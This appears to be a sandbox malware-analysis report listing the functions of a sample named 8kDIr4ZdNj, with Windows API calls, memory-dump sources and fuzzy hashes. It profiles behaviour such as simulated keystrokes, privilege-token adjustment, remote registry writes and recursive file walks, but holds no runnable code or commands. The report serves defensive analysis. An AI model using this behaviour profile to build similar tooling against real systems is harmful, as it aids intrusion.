                                                                        Function 014FF2E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 014FF2F3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                        • Instruction ID: 25856ffab5765db4b21f5591515393ff9e8fb8483c6b96e622cfc329952f84d9
                                                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                        • Instruction Fuzzy Hash: DAE0C232D0520CEBDB10CBBCED48AAE73A8EB05320F00465EEA06C33D0D5308A08D760
                                                                        Function 00895C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,008CDD42,?,?,00000000), ref: 00895C5F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: aa5dff4b2876e7e566a84606aec69dd836d0007971e9a7f4f7c4f99ee68677f2
                                                                        • Instruction ID: 210d78310a100fdd780306eb6ed4f6539cd09c9fd46e71f678cc8cabceec3569
                                                                        • Opcode Fuzzy Hash: aa5dff4b2876e7e566a84606aec69dd836d0007971e9a7f4f7c4f99ee68677f2
                                                                        • Instruction Fuzzy Hash: 0AD0C77465420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6B27D509795
                                                                        Function 014FF2B8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 014FF2C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                        • Instruction ID: 1bb13c602b70885a148110fea2ad505648b995312228b32220796e06f0f675b7
                                                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                        • Instruction Fuzzy Hash: 9AD05E3594520CABCB10CBA899049DE73A89705321F004759EA15933C0D53299049754
                                                                        Function 008FD07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 008FD1FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1452528299-0
                                                                        • Opcode ID: 841f02896ab1f72f4e9fbde57a0fcb659d17788f00486b9642152e94911edc7b
                                                                        • Instruction ID: 13b345086c9b69cade90e308976dd039a760cbbe805c5b1fa467acde2233e0e8
                                                                        • Opcode Fuzzy Hash: 841f02896ab1f72f4e9fbde57a0fcb659d17788f00486b9642152e94911edc7b
                                                                        • Instruction Fuzzy Hash: 817162302047058FDB05EF68D491A6AB7E1FF99314F08492DFA96DB3A1DB30E945CB92
                                                                        Function 01500CB4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 01500CC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction ID: 0e13251a0390b9d790109f49a6c0edde440c19b6dc35d180a9d36cfddb90534e
                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction Fuzzy Hash: D4E09A7498020DAFDB00DFA4D64969D7BB4FF04301F1005A1FD0596680DA309A548A62
                                                                        Function 01500CB8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 01500CC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: bd202e9e20fe030415a0243fa70cc93f29f193f8cd127297fff360f1da20b6fb
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 45E0E67498020DDFDB00DFF4D64969D7BB4FF04301F100161FD01D2280D6309D508A62

                                                                        Non-executed Functions

                                                                        Function 0091CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?), ref: 0091CB37
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0091CB95
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0091CBD6
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0091CC00
                                                                        • SendMessageW.USER32 ref: 0091CC29
                                                                        • _wcsncpy.LIBCMT ref: 0091CC95
                                                                        • GetKeyState.USER32(00000011), ref: 0091CCB6
                                                                        • GetKeyState.USER32(00000009), ref: 0091CCC3
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0091CCD9
                                                                        • GetKeyState.USER32(00000010), ref: 0091CCE3
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0091CD0C
                                                                        • SendMessageW.USER32 ref: 0091CD33
                                                                        • SendMessageW.USER32(?,00001030,?,0091B348), ref: 0091CE37
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?), ref: 0091CE4D
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0091CE60
                                                                        • SetCapture.USER32(?), ref: 0091CE69
                                                                        • ClientToScreen.USER32(?,?), ref: 0091CECE
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0091CEDB
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 0091CEF5
                                                                        • ReleaseCapture.USER32 ref: 0091CF00
                                                                        • GetCursorPos.USER32(?), ref: 0091CF3A
                                                                        • ScreenToClient.USER32(?,?), ref: 0091CF47
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0091CFA3
                                                                        • SendMessageW.USER32 ref: 0091CFD1
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0091D00E
                                                                        • SendMessageW.USER32 ref: 0091D03D
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0091D05E
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0091D06D
                                                                        • GetCursorPos.USER32(?), ref: 0091D08D
                                                                        • ScreenToClient.USER32(?,?), ref: 0091D09A
                                                                        • GetParent.USER32(?), ref: 0091D0BA
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0091D123
                                                                        • SendMessageW.USER32 ref: 0091D154
                                                                        • ClientToScreen.USER32(?,?), ref: 0091D1B2
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0091D1E2
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0091D20C
                                                                        • SendMessageW.USER32 ref: 0091D22F
                                                                        • ClientToScreen.USER32(?,?), ref: 0091D281
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0091D2B5
                                                                          • Part of subcall function 008925DB: GetWindowLongW.USER32(?,000000EB), ref: 008925EC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0091D351
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 3977979337-4164748364
                                                                        • Opcode ID: 95e5eccd1f69246220e4dc33c8ceb25ce8a709ee4521b7934517114cdc356ac3
                                                                        • Instruction ID: 975e064826741510acd0d440f3056d60e37627df6b063f955c977382daa66fe8
                                                                        • Opcode Fuzzy Hash: 95e5eccd1f69246220e4dc33c8ceb25ce8a709ee4521b7934517114cdc356ac3
                                                                        • Instruction Fuzzy Hash: 1342AE74348349AFDB20CF29D854AAABBE9FF49310F144919F595C72A1C731E890EB52
                                                                        Function 008A6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_memset
                                                                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                        • API String ID: 1357608183-1798697756
                                                                        • Opcode ID: 38e83fc35d2dc2668c39bb4cf2bb11759dd1f8c28d2d73e54153e9863a9d74aa
                                                                        • Instruction ID: a4a3417b549732f9bae43853414f82b8a52339ba51ee1ded0e53bbeb01c1372e
                                                                        • Opcode Fuzzy Hash: 38e83fc35d2dc2668c39bb4cf2bb11759dd1f8c28d2d73e54153e9863a9d74aa
                                                                        • Instruction Fuzzy Hash: C693C071A00259DFDF24CF99C885BADB7B1FF49314F24816AE949EB281E7709E81DB40
                                                                        Function 008948D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(00000000,?), ref: 008948DF
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008CD665
                                                                        • IsIconic.USER32(?), ref: 008CD66E
                                                                        • ShowWindow.USER32(?,00000009), ref: 008CD67B
                                                                        • SetForegroundWindow.USER32(?), ref: 008CD685
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008CD69B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 008CD6A2
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 008CD6AE
                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008CD6BF
                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008CD6C7
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 008CD6CF
                                                                        • SetForegroundWindow.USER32(?), ref: 008CD6D2
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD6E7
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD6F2
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD6FC
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD701
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD70A
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD70F
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008CD719
                                                                        • keybd_event.USER32(00000012,00000000), ref: 008CD71E
                                                                        • SetForegroundWindow.USER32(?), ref: 008CD721
                                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 008CD748
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 4125248594-2988720461
                                                                        • Opcode ID: 39d5ca753044a63bce77a7c7bd9d3722c411574659ce8bfddc7480146f88ed9d
                                                                        • Instruction ID: 9910cccb410bdcf2920f02024962012824144fd54d75757c11b4bc0daf96ca8b
                                                                        • Opcode Fuzzy Hash: 39d5ca753044a63bce77a7c7bd9d3722c411574659ce8bfddc7480146f88ed9d
                                                                        • Instruction Fuzzy Hash: F9315371B5431CBAEB206F619C49FBF7E6DEB44B50F108039FA05EA1D1D6B09901FAA1
                                                                        Function 008E8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E882B
                                                                          • Part of subcall function 008E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E8858
                                                                          • Part of subcall function 008E87E1: GetLastError.KERNEL32 ref: 008E8865
                                                                        • _memset.LIBCMT ref: 008E8353
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008E83A5
                                                                        • CloseHandle.KERNEL32(?), ref: 008E83B6
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008E83CD
                                                                        • GetProcessWindowStation.USER32 ref: 008E83E6
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 008E83F0
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008E840A
                                                                          • Part of subcall function 008E81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 008E81E0
                                                                          • Part of subcall function 008E81CB: CloseHandle.KERNEL32(?), ref: 008E81F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                        • String ID: $default$winsta0
                                                                        • API String ID: 2063423040-1027155976
                                                                        • Opcode ID: cd0f77f2dd1b34ed522952b09dd9f05305a1b21dc58f0c5fcc42e76d7de1f0f2
                                                                        • Instruction ID: e1f0e19f5e145f1a8eccf0c76c4bd32bd1eba6e5370f44e98e7ba01070b1f3c7
                                                                        • Opcode Fuzzy Hash: cd0f77f2dd1b34ed522952b09dd9f05305a1b21dc58f0c5fcc42e76d7de1f0f2
                                                                        • Instruction Fuzzy Hash: 5381457190028DEEDF119FA5CC45AEEBBB9FF05344F148169F819E62A1DB318E14EB21
                                                                        Function 008FEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 008FEFB6
                                                                        • _wcscmp.LIBCMT ref: 008FEFCB
                                                                        • _wcscmp.LIBCMT ref: 008FEFE2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 008FEFF4
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 008FF00E
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 008FF026
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF031
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 008FF04D
                                                                        • _wcscmp.LIBCMT ref: 008FF074
                                                                        • _wcscmp.LIBCMT ref: 008FF08B
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FF09D
                                                                        • SetCurrentDirectoryW.KERNEL32(00948920), ref: 008FF0BB
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 008FF0C5
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF0D2
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF0E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: 8b46cdfc8162e8b61bf8fd38f6a0cfd17039216efffd46c3bd619a637a01e456
                                                                        • Instruction ID: ce0c318a4154bdb16a9ab0cade42508890c58506401b8d9205ce26953e5403f8
                                                                        • Opcode Fuzzy Hash: 8b46cdfc8162e8b61bf8fd38f6a0cfd17039216efffd46c3bd619a637a01e456
                                                                        • Instruction Fuzzy Hash: DC31D43260460D6ADB14DBB4DC58AFE77ACFF84360F104175EA14D21A2DF70DA40DA51
                                                                        Function 00910857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00910953
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0091F910,00000000,?,00000000,?,?), ref: 009109C1
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00910A09
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00910A92
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00910DB2
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00910DBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 4bf0fb2bd46a77ef026cf8df5463cb5ad4cc60742f146fb6e4da4cb4328dafe3
                                                                        • Instruction ID: 0f955f9807ab220511cd6b513d3a344201d9137701eafdde6ef7257b71f23906
                                                                        • Opcode Fuzzy Hash: 4bf0fb2bd46a77ef026cf8df5463cb5ad4cc60742f146fb6e4da4cb4328dafe3
                                                                        • Instruction Fuzzy Hash: B3025E756046059FDB14EF18C851E6AB7E9FF89314F04845CF89A9B362DB71EC81CB82
                                                                        Function 008FF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 008FF113
                                                                        • _wcscmp.LIBCMT ref: 008FF128
                                                                        • _wcscmp.LIBCMT ref: 008FF13F
                                                                          • Part of subcall function 008F4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008F43A0
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 008FF16E
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF179
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 008FF195
                                                                        • _wcscmp.LIBCMT ref: 008FF1BC
                                                                        • _wcscmp.LIBCMT ref: 008FF1D3
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FF1E5
                                                                        • SetCurrentDirectoryW.KERNEL32(00948920), ref: 008FF203
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 008FF20D
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF21A
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF22C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: e94fa27545530c225c4ec75af50997ac58d438a8495f60f41facb333d28241bf
                                                                        • Instruction ID: fd985a6ee254e42d2995204ecea0a0a15ed8e7f886099abe331141ce8b8e97f3
                                                                        • Opcode Fuzzy Hash: e94fa27545530c225c4ec75af50997ac58d438a8495f60f41facb333d28241bf
                                                                        • Instruction Fuzzy Hash: AF31043660460D6ADB20AB74EC58EFE77ACFF84364F104171EA14E21A2DB30DA85CA54
                                                                        Function 008E7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008E8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E821E
                                                                          • Part of subcall function 008E8202: GetLastError.KERNEL32(?,008E7CE2,?,?,?), ref: 008E8228
                                                                          • Part of subcall function 008E8202: GetProcessHeap.KERNEL32(00000008,?,?,008E7CE2,?,?,?), ref: 008E8237
                                                                          • Part of subcall function 008E8202: HeapAlloc.KERNEL32(00000000,?,008E7CE2,?,?,?), ref: 008E823E
                                                                          • Part of subcall function 008E8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E8255
                                                                          • Part of subcall function 008E829F: GetProcessHeap.KERNEL32(00000008,008E7CF8,00000000,00000000,?,008E7CF8,?), ref: 008E82AB
                                                                          • Part of subcall function 008E829F: HeapAlloc.KERNEL32(00000000,?,008E7CF8,?), ref: 008E82B2
                                                                          • Part of subcall function 008E829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008E7CF8,?), ref: 008E82C3
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008E7D13
                                                                        • _memset.LIBCMT ref: 008E7D28
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008E7D47
                                                                        • GetLengthSid.ADVAPI32(?), ref: 008E7D58
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 008E7D95
